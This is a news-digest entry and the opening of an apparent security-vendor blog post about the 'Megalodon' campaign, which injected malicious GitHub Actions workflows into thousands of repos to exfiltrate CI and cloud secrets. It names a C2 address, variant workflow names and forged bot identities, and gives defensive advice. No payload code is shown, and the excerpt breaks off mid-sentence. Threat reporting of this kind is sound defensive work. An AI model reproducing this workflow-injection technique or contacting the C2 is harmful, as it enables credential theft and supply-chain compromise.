Megalodon: Mass GitHub Repo Backdooring via CI Workflows
Scored daily by a customisable AI persona to surface the most relevant engineering leadership news.
Critical vulnerability revelation about mass repo backdooring via CI workflows.
In the Megalodon campaign, an attacker pushed 5,718 malicious commits across 5,561 GitHub repos in six hours, forging identities like `build-bot` to inject GitHub Actions workflows. The mass variant (`SysDiag`) triggers on every push and pull request, while the targeted variant (`Optimize-Build`) uses `workflow_dispatch` for on-demand secret exfiltration—including AWS/GCP/Azure credentials, OIDC tokens, and SSH keys—to C2 at 216.126.225.129:8443. The attack spread via compromised Tiledesk npm package versions 2.18.6–2.18.12, originating from the legitimate maintainer's GitHub repo, not the npm account.
Audit all GitHub Actions workflow permissions (especially `id-token: write`) and pin CI dependency versions to detect injection attacks like Megalodon.
For a platform/cloud engineer managing CI/CD and open-source dependencies, this attack demonstrates a critical supply chain vector where compromised GitHub repos inject malicious workflows that can exfiltrate cloud credentials and OIDC tokens, enabling full cloud identity impersonation.
Back to Blog Megalodon: Mass GitHub Repo Backdooring via CI Workflows Malware SafeDep Team • May 21, 2026 • 11 min read Table of Contents TL;DR On May 18, 2026, an automated campaign codenamed megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in a six-hour window. Using throwaway accounts and forged author identities ( build-bot , auto-ci , ci-bot , pipeline-bot ), the attacker injected GitHub Actions workflows containing base64-encoded bash payloads that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at